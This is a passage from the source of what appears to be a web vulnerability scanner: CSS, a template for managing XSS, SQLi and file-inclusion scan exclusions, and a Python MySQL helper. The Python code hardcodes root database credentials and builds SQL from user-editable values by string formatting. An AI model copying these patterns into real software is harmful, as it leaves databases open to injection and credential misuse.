3 | .uk-dotnav{padding:0;list-style:none;font-size:0}.uk-dotnav>li{display:inline-block;font-size:1rem;vertical-align:top}.uk-dotnav>li:nth-child(n+2){margin-left:15px}.uk-dotnav>li>a{display:inline-block;-moz-box-sizing:content-box;box-sizing:content-box;width:20px;height:20px;border-radius:50%;background:rgba(50,50,50,.1);vertical-align:top;overflow:hidden;text-indent:-999%;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.uk-dotnav>li>a:hover,.uk-dotnav>li>a:focus{background:rgba(50,50,50,.4);outline:0}.uk-dotnav>li>a:active{background:rgba(50,50,50,.6)}.uk-dotnav>li.uk-active>a{background:rgba(50,50,50,.4);-webkit-transform:scale(1.3);transform:scale(1.3)}.uk-dotnav-vertical>li{display:block}.uk-dotnav-vertical>li:nth-child(n+2){margin-left:0;margin-top:15px}.uk-slidenav{display:inline-block;-moz-box-sizing:border-box;box-sizing:border-box;width:60px;height:60px;line-height:60px;color:rgba(50,50,50,.4);font-size:60px;text-align:center}.uk-slidenav:hover,.uk-slidenav:focus{outline:0;text-decoration:none;color:rgba(50,50,50,.7);cursor:pointer}.uk-slidenav:active{color:rgba(50,50,50,.9)}.uk-slidenav-previous:before{content:"\f104";font-family:FontAwesome}.uk-slidenav-next:before{content:"\f105";font-family:FontAwesome}.uk-slidenav-position{display:inline-block;-moz-box-sizing:border-box;box-sizing:border-box;max-width:100%;position:relative}.uk-slidenav-position .uk-slidenav{display:none;position:absolute;top:50%;margin-top:-30px}.uk-slidenav-position:hover .uk-slidenav{display:block}.uk-slidenav-position .uk-slidenav-previous{left:20px}.uk-slidenav-position .uk-slidenav-next{right:20px}.uk-form-file{position:relative;display:inline-block;vertical-align:middle;overflow:hidden}.uk-form-file input[type=file]{position:absolute;top:0;bottom:0;z-index:1;width:100%;opacity:0;cursor:pointer;left:0;font-size:500px}.uk-form-password{position:relative;display:inline-block;max-width:100%}.uk-form-password-toggle{display:block;position:absolute;top:50%;right:10px;margin-top:-6px;font-size:13px;line-height:13px;color:#999}.uk-form-password-toggle:hover{color:#999;text-decoration:none}.uk-form-password>input{padding-right:50px!important}.uk-placeholder{margin-bottom:15px;padding:20px;border:1px dashed #ddd;background:#fafafa;color:#444}*+.uk-placeholder{margin-top:15px}.uk-placeholder>:last-child{margin-bottom:0}.uk-placeholder-large{padding-top:80px;padding-bottom:80px}.uk-autocomplete{display:inline-block;vertical-align:middle;position:relative}.uk-nav-autocomplete>li>a{color:#444}.uk-nav-autocomplete>li.uk-active>a{background:#009dd8;color:#fff;outline:0;box-shadow:inset 0 2px 4px rgba(0,0,0,.2);text-shadow:0 -1px 0 rgba(0,0,0,.2)}.uk-nav-autocomplete .uk-nav-header{color:#999}.uk-nav-autocomplete .uk-nav-divider{border-top:1px solid #ddd}.uk-datepicker{width:auto}.uk-datepicker-nav{margin-bottom:15px;text-align:center;line-height:20px}.uk-datepicker-nav:before,.uk-datepicker-nav:after{content:" ";display:table}.uk-datepicker-nav:after{clear:both}.uk-datepicker-nav a{color:#444;text-decoration:none}.uk-datepicker-nav a:hover{color:#444}.uk-datepicker-previous{float:left}.uk-datepicker-next{float:right}.uk-datepicker-previous:after,.uk-datepicker-next:after{width:20px;font-family:FontAwesome}.uk-datepicker-previous:after{content:"\f053"}.uk-datepicker-next:after{content:"\f054"}.uk-datepicker-table{width:100%}.uk-datepicker-table th,.uk-datepicker-table td{padding:2px}.uk-datepicker-table th{font-size:12px}.uk-datepicker-table a{display:block;width:26px;line-height:24px;text-align:center;color:#444;text-decoration:none;border:1px solid transparent;border-radius:4px;background-origin:border-box}a.uk-datepicker-table-muted{color:#999}.uk-datepicker-table a:hover,.uk-datepicker-table a:focus{background-color:#fafafa;color:#444;outline:0;border-color:rgba(0,0,0,.2);border-bottom-color:rgba(0,0,0,.3);text-shadow:0 1px 0 #fff}.uk-datepicker-table a:active{background-color:#f5f5f5;color:#444;border-color:rgba(0,0,0,.2);border-top-color:rgba(0,0,0,.3);background-image:none;box-shadow:inset 0 2px 4px rgba(0,0,0,.1)}.uk-datepicker-table a.uk-active{background:#009dd8;color:#fff;border:1px solid rgba(0,0,0,.2);border-bottom-color:rgba(0,0,0,.4);background-origin:border-box;background-image:-webkit-linear-gradient(top,#00b4f5,#008dc5);background-image:linear-gradient(to bottom,#00b4f5,#008dc5);text-shadow:0 -1px 0 rgba(0,0,0,.2)}.uk-markdownarea-navbar{background:#f7f7f7;border:1px solid rgba(0,0,0,.1);border-bottom-color:rgba(0,0,0,.2);border-top-left-radius:4px;border-top-right-radius:4px;background-origin:border-box;background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:linear-gradient(to bottom,#fff,#eee)}.uk-markdownarea-navbar:before,.uk-markdownarea-navbar:after{content:" ";display:table}.uk-markdownarea-navbar:after{clear:both}.uk-markdownarea-navbar-nav{margin:0;padding:0;list-style:none;float:left}.uk-markdownarea-navbar-nav>li{float:left}.uk-markdownarea-navbar-nav>li>a{display:block;-moz-box-sizing:border-box;box-sizing:border-box;text-decoration:none;height:41px;padding:0 15px;line-height:40px;color:#444;font-size:11px;cursor:pointer;margin-top:-1px;margin-left:-1px;border:1px solid transparent;border-bottom-width:0;text-shadow:0 1px 0 #fff}.uk-markdownarea-navbar-nav>li:hover>a,.uk-markdownarea-navbar-nav>li>a:focus{background-color:transparent;color:#444;outline:0;position:relative;z-index:1;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.1);box-shadow:inset 0 2px 4px rgba(0,0,0,.1)}.uk-markdownarea-navbar-nav>li>a:active{background-color:#f5f5f5;color:#444;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.2);box-shadow:inset 0 2px 4px rgba(0,0,0,.1)}.uk-markdownarea-navbar-nav>li.uk-active>a{background-color:#fafafa;color:#444;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.2);box-shadow:inset 0 2px 4px rgba(0,0,0,.1)}.uk-markdownarea-navbar-flip{float:right}[data-mode=split] .uk-markdown-button-markdown,[data-mode=split] .uk-markdown-button-preview{display:none}.uk-markdownarea-content{border-left:1px solid #ddd;border-right:1px solid #ddd;border-bottom:1px solid #ddd;background:#fff;border-bottom-left-radius:4px;border-bottom-right-radius:4px}.uk-markdownarea-content:before,.uk-markdownarea-content:after{content:" ";display:table}.uk-markdownarea-content:after{clear:both}.uk-markdownarea-fullscreen{position:fixed;top:0;left:0;right:0;bottom:0;z-index:990}.uk-markdownarea-fullscreen .uk-markdownarea-content{position:absolute;top:41px;left:0;right:0;bottom:0}.uk-markdownarea-fullscreen .uk-icon-expand:before{content:"\f066"}.uk-markdownarea-code,.uk-markdownarea-preview{-moz-box-sizing:border-box;box-sizing:border-box}.uk-markdownarea-preview{padding:20px;overflow-y:scroll}[data-mode=tab][data-active-tab=code] .uk-markdownarea-preview,[data-mode=tab][data-active-tab=preview] .uk-markdownarea-code{display:none}[data-mode=split] .uk-markdownarea-code,[data-mode=split] .uk-markdownarea-preview{float:left;width:50%}[data-mode=split] .uk-markdownarea-code{border-right:1px solid #eee}.uk-markdownarea .CodeMirror{padding:10px;-moz-box-sizing:border-box;box-sizing:border-box}.uk-markdownarea-navbar-nav:first-child>li:first-child>a{border-top-left-radius:4px}.uk-markdownarea-navbar-flip .uk-markdownarea-navbar-nav>li>a{margin-left:0;margin-right:-1px}.uk-markdownarea-navbar-flip .uk-markdownarea-navbar-nav:first-child>li:first-child>a{border-top-left-radius:0}.uk-markdownarea-navbar-flip .uk-markdownarea-navbar-nav:last-child>li:last-child>a{border-top-right-radius:4px}.uk-markdownarea-fullscreen .uk-markdownarea-navbar{border-top:none;border-left:none;border-right:none;border-radius:0}.uk-markdownarea-fullscreen .uk-markdownarea-content{border:none;border-radius:0}.uk-markdownarea-fullscreen .uk-markdownarea-navbar-nav>li>a{border-radius:0!important}.uk-notify{position:fixed;top:10px;left:10px;z-index:980;-moz-box-sizing:border-box;box-sizing:border-box;width:350px}.uk-notify-top-right,.uk-notify-bottom-right{left:auto;right:10px}.uk-notify-top-center,.uk-notify-bottom-center{left:50%;margin-left:-175px}.uk-notify-bottom-left,.uk-notify-bottom-right,.uk-notify-bottom-center{top:auto;bottom:10px}@media (max-width:479px){.uk-notify{left:10px;right:10px;width:auto;margin:0}}.uk-notify-message{position:relative;margin-bottom:10px;padding:15px;background:#444;color:#fff;font-size:16px;line-height:22px;cursor:pointer;border:1px solid #444;border-radius:4px}.uk-notify-message>.uk-close{visibility:hidden;float:right}.uk-notify-message:hover>.uk-close{visibility:visible}.uk-notify-message-primary{background:#ebf7fd;color:#2d7091;border-color:rgba(45,112,145,.3)}.uk-notify-message-success{background:#f2fae3;color:#659f13;border-color:rgba(101,159,19,.3)}.uk-notify-message-warning{background:#fffceb;color:#e28327;border-color:rgba(226,131,39,.3)}.uk-notify-message-danger{background:#fff1f0;color:#d85030;border-color:rgba(216,80,48,.3)}.uk-search{display:inline-block;position:relative;margin:0}.uk-search:before{content:"\f002";position:absolute;top:0;left:0;width:30px;line-height:30px;text-align:center;font-family:FontAwesome;font-size:14px;color:rgba(0,0,0,.2)}.uk-search-field{width:120px;height:30px;padding:0 30px;border:1px solid rgba(0,0,0,0);background:rgba(0,0,0,0);color:#444;-webkit-transition:all linear .2s;transition:all linear .2s;border-radius:0}input.uk-search-field{-webkit-appearance:none}.uk-search-field:-ms-input-placeholder{color:#999}.uk-search-field::-moz-placeholder{color:#999}.uk-search-field::-webkit-input-placeholder{color:#999}.uk-search-field::-ms-clear{display:none}.uk-search-field:focus{outline:0}.uk-search-field:focus,.uk-active .uk-search-field{width:180px}.uk-search-close{display:none;position:absolute;top:0;right:0;width:30px;line-height:30px;text-align:center;font-size:14px;color:rgba(0,0,0,.2);padding:0;border:0;-webkit-appearance:none;background:0 0}.uk-loading>.uk-search-close,.uk-active>.uk-search-close{display:block}.uk-search-close:after{display:block;content:"\f00d";font-family:FontAwesome}.uk-loading>.uk-search-close:after{content:"\f110";-webkit-animation:uk-spin 2s infinite linear;animation:uk-spin 2s infinite linear}.uk-dropdown-search{width:300px;margin-top:0;background:#fff;color:#444}.uk-open>.uk-dropdown-search{-webkit-animation:uk-slide-top-fixed .2s ease-in-out;animation:uk-slide-top-fixed .2s ease-in-out}.uk-navbar-flip .uk-dropdown-search{margin-top:12px;margin-right:-16px}.uk-nav-search>li>a{color:#444}.uk-nav-search>li.uk-active>a{background:#009dd8;color:#fff;outline:0;box-shadow:inset 0 2px 4px rgba(0,0,0,.2);text-shadow:0 -1px 0 rgba(0,0,0,.2)}.uk-nav-search .uk-nav-header{color:#999}.uk-nav-search .uk-nav-divider{border-top:1px solid #ddd}.uk-nav-search ul a{color:#07d}.uk-nav-search ul a:hover{color:#059}.uk-offcanvas .uk-search{display:block;margin:20px 15px}.uk-offcanvas .uk-search:before{color:#777}.uk-offcanvas .uk-search-field{width:100%;border-color:rgba(0,0,0,0);background:#1a1a1a;color:#ccc}.uk-offcanvas .uk-search-field:-ms-input-placeholder{color:#777}.uk-offcanvas .uk-search-field::-moz-placeholder{color:#777}.uk-offcanvas .uk-search-field::-webkit-input-placeholder{color:#777}.uk-sortable{padding:0;list-style:none}.uk-sortable-list{margin:0;padding-left:40px;list-style:none}.uk-sortable-list-dragged{position:absolute;z-index:1050;padding-left:0;pointer-events:none}.uk-sortable-item{margin-bottom:10px;padding:5px;background:#f7f7f7;border-radius:4px;border:1px solid rgba(0,0,0,.2);border-bottom-color:rgba(0,0,0,.3);background-origin:border-box;background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:linear-gradient(to bottom,#fff,#eee);text-shadow:0 1px 0 #fff}.uk-sortable-placeholder{-moz-box-sizing:border-box;box-sizing:border-box;margin-bottom:10px;border:1px dashed #ddd}.uk-sortable-empty{min-height:40px}.uk-sortable-handle{display:inline-block;font-size:18px;color:#ddd}.uk-sortable-handle:hover{cursor:move}.uk-sortable-handle:after{content:"\f0c9";font-family:FontAwesome}.uk-sortable-moving,.uk-sortable-moving *{cursor:move}[data-sortable-action=toggle]{display:inline-block;color:#999;visibility:hidden}[data-sortable-action=toggle]:hover{color:#444;cursor:pointer}[data-sortable-action=toggle]:after{content:"\f147";font-family:FontAwesome}.uk-parent>.uk-sortable-item [data-sortable-action=toggle]{visibility:visible}.uk-collapsed>.uk-sortable-item [data-sortable-action=toggle]:after{content:"\f196"}.uk-collapsed .uk-sortable-list{display:none}.uk-sticky{z-index:980}.uk-dragover{box-shadow:0 0 20px rgba(100,100,100,.3)}


--------------------------------------------------------------------------------
/www/templates/manage_exclusion_view.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}
  4 | Exclusions -
  5 | {% if type == 'parse' %}Log Parse
  6 | {% elif type == 'cookie' %}Cookie Parameter
  7 | {% elif type == 'xss' %}XSS Scan
  8 | {% elif type == 'sqli' %}SQLi Scan
  9 | {% elif type == 'fi' %}FI Scan
 10 | {% else %}Unknown
 11 | {% endif %}
 12 | {% endblock %}
 13 | 
 14 | {% block beforehead %}
 15 | 
 16 | <script>
 17 | 
 18 | function initVM(data) {
 19 |     $('#form-exclusion').show();
 20 |     var vm = new Vue({
 21 |         el: '#form-exclusion',
 22 |         data: {
 23 |             exclusion: data.exclusion,
 24 |             type: data.type,
 25 |         },
 26 |         methods: {
 27 |             submit: function (event) {
 28 |                 event.preventDefault();
 29 |                 startLoading();
 30 |                 postApi('/api/exclusions/{{ type }}/update', this.exclusion, function (err, r) {
 31 |                     if (err) {
 32 |                         showError(err);
 33 |                         $('#error_alert').show();
 34 |                         setTimeout("$('#error_alert').hide()", 3000);
 35 |                     }
 36 |                     else {
 37 |                         if (r.result=='success'){
 38 |                             $('#update_success').show();
 39 |                             setTimeout("$('#update_success').hide()", 3000);
 40 |                         }
 41 |                         if (r.result=='failed'){
 42 |                             $('#update_failed').show();
 43 |                             setTimeout("$('#update_success').hide()", 3000);
 44 |                         }
 45 |                     }
 46 |                     stopLoading();
 47 |                 });
 48 | 
 49 |             }
 50 |         }
 51 |     });
 52 | }
 53 | 
 54 | $(function() {
 55 |     getApi('/api/exclusions/{{ type }}/view', function (err, results) {
 56 |         if (err) {
 57 |             return showError(err);
 58 |         }
 59 |         $('#div-loading').hide();
 60 |         $('#update_success').hide();
 61 |         $('#update_failed').hide();
 62 |         initVM(results);
 63 |     });
 64 | });
 65 | 
 66 | </script>
 67 | 
 68 | {% endblock %}
 69 | 
 70 | {% block content %}
 71 | 
 72 |     <div class="uk-width-1-1">
 73 |         <div class="uk-container uk-container-center">
 74 |             <div data-uk-grid-margin="" class="uk-grid">
 75 |                 <div class="tm-sidebar uk-width-medium-1-4 uk-hidden-small uk-row-first">
 76 |                     <ul data-uk-nav="" class="tm-nav uk-nav">
 77 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Exclusions</li>
 78 |                         <li><a href="/manage/exclusions/parse/view">Log Parse</a></li>
 79 |                         <li><a href="/manage/exclusions/cookie/view">Cookie Parameter</a></li>
 80 |                         <li><a href="/manage/exclusions/xss/view">XSS Scan</a></li>
 81 |                         <li><a href="/manage/exclusions/sqli/view">SQLi Scan</a></li>
 82 |                         <li><a href="/manage/exclusions/fi/view">FI Scan</a></li>
 83 | 
 84 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Scan Options</li>
 85 |                         <li><a href="/manage/scan/sqlmap/view">SQLMAP Servers</a></li>
 86 |                     </ul>
 87 |                 </div>
 88 |                 <div class="tm-main uk-width-medium-3-4">
 89 |                     <form id="form-exclusion" v-on="submit: submit" class="uk-form uk-form-stacked" style="display:none">
 90 |                         <div id="error_alert" class="uk-width-1-1"><div class="uk-alert uk-alert-danger uk-hidden"></div></div>
 91 |                         <div id="update_success" class="uk-alert uk-alert-success" style="display:none"><a href="" class="uk-alert-close uk-close"></a><p>Update Success</p></div>
 92 |                         <div id="update_failed" class="uk-alert uk-alert-warning" style="display:none"><a href="" class="uk-alert-close uk-close"></a><p>Update Failed</p></div>
 93 |                         <div v-if="type=='xss' || type=='sqli' || type=='fi'">
 94 |                             <h1 v-if="type=='xss'" class="uk-text-large uk-text-bold">XSS Scan Exclusions</h1>
 95 |                             <h1 v-if="type=='sqli'" class="uk-text-large uk-text-bold">SQLi Scan Exclusions</h1>
 96 |                             <h1 v-if="type=='fi'" class="uk-text-large uk-text-bold">File Inclusion Scan Exclusions</h1>
 97 |                             <p class="uk-text-warning">Please use | as delimiter for multiple exclusions or leave it blank if no exclusion.</p>
 98 |                             <div class="uk-form-row">
 99 |                                 <label class="uk-form-label">Method: <span class="uk-text-small uk-text-success">(e.g. GET, POST, GET|POST)</span></label>
100 |                                 <div class="uk-form-controls">
101 |                                     <input v-model="exclusion.method" name="method" type="text" class="uk-width-1-1">
102 |                                 </div>
103 |                             </div>
104 |                             <div class="uk-form-row">
105 |                                 <label class="uk-form-label">Protocol: <span class="uk-text-small uk-text-success">(e.g. HTTP, HTTPS, HTTP|HTTPS)</span></label>
106 |                                 <div class="uk-form-controls">
107 |                                     <input v-model="exclusion.protocol" name="protocol" type="text" class="uk-width-1-1">
108 |                                 </div>
109 |                             </div>
110 |                             <div class="uk-form-row">
111 |                                 <label class="uk-form-label">Host: <span class="uk-text-small uk-text-success">(e.g. google|baidu)</span></label>
112 |                                 <div class="uk-form-controls">
113 |                                     <input v-model="exclusion.host" name="host" type="text" class="uk-width-1-1">
114 |                                 </div>
115 |                             </div>
116 |                             <div class="uk-form-row">
117 |                                 <label class="uk-form-label">IP:</label>
118 |                                 <div class="uk-form-controls">
119 |                                     <input v-model="exclusion.ip" name="ip" type="text" class="uk-width-1-1">
120 |                                 </div>
121 |                             </div>
122 |                             <div class="uk-form-row">
123 |                                 <label class="uk-form-label">Port: <span class="uk-text-small uk-text-success">(e.g. 443)</span></label>
124 |                                 <div class="uk-form-controls">
125 |                                     <input v-model="exclusion.port" name="port" type="text" class="uk-width-1-1">
126 |                                 </div>
127 |                             </div>
128 |                             <div class="uk-form-row">
129 |                                 <label class="uk-form-label">Path:</label>
130 |                                 <div class="uk-form-controls">
131 |                                     <input v-model="exclusion.path" name="path" type="text" class="uk-width-1-1">
132 |                                 </div>
133 |                             </div>
134 |                             <div class="uk-form-row">
135 |                                 <label class="uk-form-label">Accept:</label>
136 |                                 <div class="uk-form-controls">
137 |                                     <input v-model="exclusion.accept" name="accept" type="text" class="uk-width-1-1">
138 |                                 </div>
139 |                             </div>
140 |                             <div class="uk-form-row">
141 |                                 <label class="uk-form-label">Accept Language:</label>
142 |                                 <div class="uk-form-controls">
143 |                                     <input v-model="exclusion.accept_language" name="accept_language" type="text" class="uk-width-1-1">
144 |                                 </div>
145 |                             </div>
146 |                             <div class="uk-form-row">
147 |                                 <label class="uk-form-label">Accept Encoding:</label>
148 |                                 <div class="uk-form-controls">
149 |                                     <input v-model="exclusion.accept_encoding" name="accept_encoding" type="text" class="uk-width-1-1">
150 |                                 </div>
151 |                             </div>
152 |                             <div class="uk-form-row">
153 |                                 <label class="uk-form-label">Referer:</label>
154 |                                 <div class="uk-form-controls">
155 |                                     <input v-model="exclusion.referer" name="referer" type="text" class="uk-width-1-1">
156 |                                 </div>
157 |                             </div>
158 |                             <div class="uk-form-row">
159 |                                 <label class="uk-form-label">User Agent:</label>
160 |                                 <div class="uk-form-controls">
161 |                                     <input v-model="exclusion.user_agent" name="user_agent" type="text" class="uk-width-1-1">
162 |                                 </div>
163 |                             </div>
164 |                             <div class="uk-form-row">
165 |                                 <label class="uk-form-label">Cookie:</label>
166 |                                 <div class="uk-form-controls">
167 |                                     <input v-model="exclusion.cookie" name="cookie" type="text" class="uk-width-1-1">
168 |                                 </div>
169 |                             </div>
170 |                             <div class="uk-form-row">
171 |                                 <label class="uk-form-label">Content Type:</label>
172 |                                 <div class="uk-form-controls">
173 |                                     <input v-model="exclusion.content_type" name="content_type" type="text" class="uk-width-1-1">
174 |                                 </div>
175 |                             </div>
176 |                             <div class="uk-form-row">
177 |                                 <label class="uk-form-label">Post Data:</label>
178 |                                 <div class="uk-form-controls">
179 |                                     <textarea v-model="exclusion.post_data" rows="3" name="post_data" class="uk-width-1-1" style="resize:none;"></textarea>
180 |                                 </div>
181 |                             </div>
182 |                         </div>
183 |                         <div v-if="type=='parse'">
184 |                             <h1 class="uk-text-large uk-text-bold">Log Parse Exclusions</h1>
185 |                             <p class="uk-text-warning">Please use | as delimiter for multiple exclusions or leave it blank if no exclusion.</p>
186 |                             <div class="uk-form-row">
187 |                                 <label class="uk-form-label">Exclusion: <span class="uk-text-small uk-text-success">(e.g. google|baidu)</span></label>
188 |                                 <div class="uk-form-controls">
189 |                                     <input v-model="exclusion.exclusion" name="exclusion" type="text" class="uk-width-1-1">
190 |                                 </div>
191 |                             </div>
192 |                         </div>
193 |                         <div v-if="type=='cookie'">
194 |                             <h1 class="uk-text-large uk-text-bold">Cookie Parameter Exclusions</h1>
195 |                             <p class="uk-text-warning">Please use | as delimiter for multiple exclusions or leave it blank if no exclusion.</p>
196 |                             <div class="uk-form-row">
197 |                                 <label class="uk-form-label">Exclusion: <span class="uk-text-small uk-text-success">(e.g. PHPSESSID|BAIDUID)</span></label>
198 |                                 <div class="uk-form-controls">
199 |                                     <input v-model="exclusion.exclusion" name="exclusion" type="text" class="uk-width-1-1">
200 |                                 </div>
201 |                             </div>
202 |                         </div>
203 |                         <div class="uk-form-row uk-text-center">
204 |                             <br/><button type="submit" class="uk-button uk-button-primary"><i class="uk-icon-save"></i> Save</button>
205 |                         </div>
206 |                     </form>
207 |                 </div>
208 |             </div>
209 |         </div>
210 |     </div>
211 | 
212 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
213 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
214 |     </div>
215 | {% endblock %}
216 | 


--------------------------------------------------------------------------------
/parser/lib/db_operation.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ Database Operations
  4 | 
  5 | This module is used to parse Burp Requests and insert into MySQL DB.
  6 | 
  7 | """
  8 | 
  9 | import MySQLdb
 10 | import time
 11 | from utils import highlight
 12 | 
 13 | def db_conn():
 14 |     try:
 15 |         user = "root"
 16 |         pwd = "toor"
 17 |         hostname = "127.0.0.1"
 18 | 
 19 |         dbname = "nagascan"
 20 |         charset = "utf8"
 21 |         dbconn = MySQLdb.connect(user=user,passwd=pwd,host=hostname,db=dbname,charset=charset)
 22 |         return dbconn
 23 |     except Exception, e:
 24 |         print highlight('[!] error: {}'.format(str(e)), 'yellow')
 25 |         pass
 26 | 
 27 | def db_insert(table, args):
 28 |     """ Insert data into table
 29 | 
 30 |         Args:
 31 |             table: The name of table
 32 |             args: The input content, it is a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}
 33 | 
 34 |     """
 35 | 
 36 |     cols = []
 37 |     for key in args.keys():
 38 |         cols.append(key)
 39 |     sql = 'INSERT INTO `%s` (%s) VALUES (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))
 40 |     sql = sql.replace('?', '%s')
 41 |     try:
 42 |         db = db_conn()
 43 |         cursor = db.cursor()
 44 |         cursor.execute(sql, args.values())
 45 |         db.commit()
 46 |         db.close()
 47 |         return True
 48 |     except Exception, e:
 49 |         print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
 50 |         return False
 51 | 
 52 | def db_update(table, args, cons):
 53 |     """ Update data in specific table with specific conditions
 54 | 
 55 |         Args:
 56 |             table: The name of table
 57 |             args: The update content, it is a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}
 58 |             cons: The conditions, it is a dict, e.g. {'id':'111'}
 59 | 
 60 |     """
 61 | 
 62 |     cols = []
 63 |     cols_cons = []
 64 |     values = []
 65 |     for k,v in args.items():
 66 |         cols.append(k)
 67 |         values.append(v)
 68 |     for k,v in cons.items():
 69 |         cols_cons.append(k)
 70 |         values.append(v)
 71 |     sql = 'UPDATE `%s` SET %s WHERE %s' % (table, ','.join(['`%s`=?' % col for col in cols]), ','.join(['`%s`=?' % col for col in cols_cons]))
 72 |     sql = sql.replace('?', '%s')
 73 |     try:
 74 |         db = db_conn()
 75 |         cursor = db.cursor()
 76 |         cursor.execute(sql, values)
 77 |         db.commit()
 78 |         db.close()
 79 |         return True
 80 |     except Exception, e:
 81 |         print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
 82 |         return False
 83 | 
 84 | def db_query(sql):
 85 |     try:
 86 |         db = db_conn()
 87 |         cursor = db.cursor()
 88 |         cursor.execute(sql)
 89 |         db.commit()
 90 |         db.close()
 91 |         query_result = cursor.fetchall()
 92 |         return query_result
 93 |     except Exception, e:
 94 |         print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
 95 |         return ''
 96 | 
 97 | def fetch_sqlmap():
 98 |     """Fetch SQLMAP servers from database
 99 | 
100 |     """
101 | 
102 |     sql = "SELECT ip, port FROM sqlmap WHERE status = 1"
103 |     sqlmaps = db_query(sql)
104 |     return sqlmaps
105 | 
106 | def fetch_exclusion_scan(scan_type):
107 |     """Fetch Scan Exclusions from database
108 | 
109 |     Args:
110 |         scan_type: Int, the scan type, e.g. 0: xss; 1: sqli; 2: fi
111 | 
112 |     """
113 | 
114 |     sql = "SELECT ip, port, protocol, host, method, user_agent, accept, accept_language, accept_encoding, cookie, referer, content_type, post_data, path FROM exclusions_scan WHERE type = {}".format(scan_type)
115 |     exclusions = db_query(sql)
116 |     return exclusions
117 | 
118 | def fetch_exclusion_parse():
119 |     """Fetch Parse Exclusions from database
120 | 
121 |     """
122 | 
123 |     sql = "SELECT exclusion FROM exclusions_parse"
124 |     exclusions = db_query(sql)
125 |     return exclusions
126 | 
127 | def fetch_exclusion_cookie():
128 |     """Fetch Cookie Exclusions from database
129 | 
130 |     """
131 | 
132 |     sql = "SELECT exclusion FROM exclusions_cookie"
133 |     exclusions = db_query(sql)
134 |     return exclusions
135 | 
136 | def fetch_request(exclude, scan_type, limit_num):
137 |     """Fetch request from database
138 | 
139 |     Args:
140 |         exclude: Exclusions of requests, it is a dict
141 |         scan_type: The scan type, e.g. scan_xss, scan_sqli
142 |         limit_num: The number of limit of requests
143 | 
144 |     """
145 | 
146 |     if exclude:
147 |         conditions = []
148 |         for key, value in exclude.items():
149 |             vals = value.split('|')
150 |             if len(vals) > 1:
151 |                 for val in vals:
152 |                     conditions.append("lower({}) not like '%{}%'".format(key, val))
153 |             else:
154 |                 conditions.append("lower({}) not like '%{}%'".format(key, vals[0]))
155 |         conditions_str = " and ".join(conditions)
156 |         sql = "SELECT rid, protocol, host, method, user_agent, accept, accept_language, accept_encoding, cookie, referer, post_data, path, scan_xss, scan_sqli FROM requests WHERE {} = 0 and {} order by id desc limit {}".format(scan_type, conditions_str, limit_num)
157 |     else:
158 |         sql = "SELECT rid, protocol, host, method, user_agent, accept, accept_language, accept_encoding, cookie, referer, post_data, path, scan_xss, scan_sqli FROM requests WHERE {} = 0 order by id desc limit {}".format(scan_type, limit_num)
159 |     requests = db_query(sql)
160 |     return requests
161 | 
162 | def get_parse_exclusion_info(exclusion):
163 |     """Convert raw parse exclusion to dict
164 | 
165 |     Args:
166 |         exclusion: raw parse exclusion from database
167 | 
168 |     Returns:
169 |         exclude: list
170 | 
171 |     """
172 | 
173 |     exclude = []
174 |     if exclusion[0]:
175 |         exclusions = exclusion[0].split('|');
176 |         for excl in exclusions:
177 |             if excl:
178 |                 exclude.append(excl)
179 |     return exclude
180 | 
181 | def get_cookie_exclusion_info(exclusion):
182 |     """Convert raw cookie exclusion to dict
183 | 
184 |     Args:
185 |         exclusion: raw cookie exclusion from database
186 | 
187 |     Returns:
188 |         exclude: list
189 | 
190 |     """
191 | 
192 |     exclude = []
193 |     if exclusion[0]:
194 |         exclusions = exclusion[0].split('|');
195 |         for excl in exclusions:
196 |             if excl:
197 |                 exclude.append(excl)
198 |     return exclude
199 | 
200 | def get_scan_exclusion_info(exclusion):
201 |     """Convert raw scan exclusion to dict
202 | 
203 |     Args:
204 |         exclusion: raw scan exclusion from database
205 | 
206 |     Returns:
207 |         exclude: dict
208 | 
209 |     """
210 | 
211 |     exclude = {}
212 |     if exclusion[0]:
213 |         exclude['ip'] = exclusion[0]
214 |     if exclusion[1]:
215 |         exclude['port'] = exclusion[1]
216 |     if exclusion[2]:
217 |         exclude['protocol'] = exclusion[2]
218 |     if exclusion[3]:
219 |         exclude['host'] = exclusion[3]
220 |     if exclusion[4]:
221 |         exclude['method'] = exclusion[4]
222 |     if exclusion[5]:
223 |         exclude['user_agent'] = exclusion[5]
224 |     if exclusion[6]:
225 |         exclude['accept'] = exclusion[6]
226 |     if exclusion[7]:
227 |         exclude['accept_language'] = exclusion[7]
228 |     if exclusion[8]:
229 |         exclude['accept_encoding'] = exclusion[8]
230 |     if exclusion[9]:
231 |         exclude['cookie'] = exclusion[9]
232 |     if exclusion[10]:
233 |         exclude['referer'] = exclusion[10]
234 |     if exclusion[11]:
235 |         exclude['content_type'] = exclusion[11]
236 |     if exclusion[12]:
237 |         exclude['post_data'] = exclusion[12]
238 |     if exclusion[13]:
239 |         exclude['path'] = exclusion[13]
240 | 
241 |     return exclude
242 | 
243 | def get_request_info(request):
244 |     """Convert raw request to dict
245 | 
246 |     Args:
247 |         request: raw request from database
248 | 
249 |     Returns:
250 |         request_info: dict
251 | 
252 |     """
253 | 
254 |     request_info = {}
255 |     request_info['rid'] = request[0]
256 |     request_info['protocol'] = request[1]
257 |     request_info['host'] = request[2]
258 |     request_info['method'] = request[3]
259 |     request_info['user_agent'] = request[4]
